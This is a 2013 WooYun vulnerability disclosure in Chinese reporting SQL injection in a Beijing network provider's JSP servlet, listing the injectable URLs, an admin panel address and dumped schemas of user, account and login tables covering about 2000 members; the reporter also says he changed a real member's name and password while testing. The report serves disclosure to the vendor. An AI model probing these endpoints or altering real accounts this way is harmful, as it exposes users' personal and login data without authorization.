当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039198

漏洞标题:四星运营商国旭网络# 某点注入至大量会员信息泄露

相关厂商:北京国旭网络科技有限公司

漏洞作者: 爱上平顶山

提交时间:2013-10-09 16:11

修复时间:2013-11-23 16:11

公开时间:2013-11-23 16:11

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-09: 细节已通知厂商并且等待厂商处理中
2013-10-13: 厂商已经确认,细节仅向厂商公开
2013-10-23: 细节向核心白帽子及相关领域专家公开
2013-11-02: 细节向普通白帽子公开
2013-11-12: 细节向实习白帽子公开
2013-11-23: 细节向公众公开

简要描述:

0.0

详细说明:

因为涉及问题比较敏感 看如何联系他们解决 最好打电话通知或者怎么办吧 邮件没有用 我试了 谢谢
SQL注入 jsp的
点:
http://www.guoxuwang.cn/servlet/checkServlet.do?id=19
http://www.guoxuwang.cn:8700/servlet/checkServlet.do?id=19
| xxmz_transaction_log |
+-------------------------------+
Database: db_gxw_domain
Table: user
[22 columns]
+------------------+---------------------+
| Column | Type |
+------------------+---------------------+
| address | varchar(255) |
| city | varchar(20) |
| create_time | datetime |
| create_user | bigint(20) |
| email | varchar(128) |
| fax_num | varchar(20) |
| id | bigint(20) unsigned |
| id_num | varchar(20) |
| id_type | char(2) |
| name | varchar(128) |
| org | varchar(255) |
| para1 | varchar(20) |
| para2 | varchar(20) |
| postcode | varchar(8) |
| province | varchar(20) |
| reseller_user_id | bigint(20) unsigned |
| status | tinyint(4) |
| tel_num | varchar(20) |
| update_time | datetime |
| update_user | bigint(20) |
| user_group_id | varchar(20) |
| user_level_id | int(10) unsigned |
+------------------+---------------------+
Database: db_gxw_domain
Table: user_account
[10 columns]
+--------------------+---------------------+
| Column | Type |
+--------------------+---------------------+
| balance_amount | decimal(10,2) |
| consume_amount | decimal(10,2) |
| credit_alert_date | date |
| id | bigint(20) unsigned |
| left_credit_amount | decimal(10,2) |
| recharge_amount | decimal(10,2) |
| status | tinyint(4) |
| update_time | datetime |
| used_credit_amount | decimal(10,2) |
| user_id | bigint(20) unsigned |
+--------------------+---------------------+
Database: db_gxw_domain
Table: user_login
[6 columns]
+-----------------+---------------------+
| Column | Type |
+-----------------+---------------------+
| id | bigint(20) unsigned |
| last_login_ip | varchar(20) |
| last_login_time | datetime |
| login | varchar(100) |
| password | varchar(100) |
| user_id | bigint(20) unsigned |
+-----------------+---------------------+
涉及用户近2000名
后台: https://cp.guoxuwang.cn/admin/

3.png


上图:

4.png


5.png


为了测试 改了一个会员名:小白兔(密码改为:x123456...) 不好意思 一切为安全测试

6.png


ok 过滤修补吧

漏洞证明:

5.png

修复方案:

改。

版权声明:转载请注明来源 爱上平顶山@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-10-13 21:22

厂商回复:

最新状态:

暂无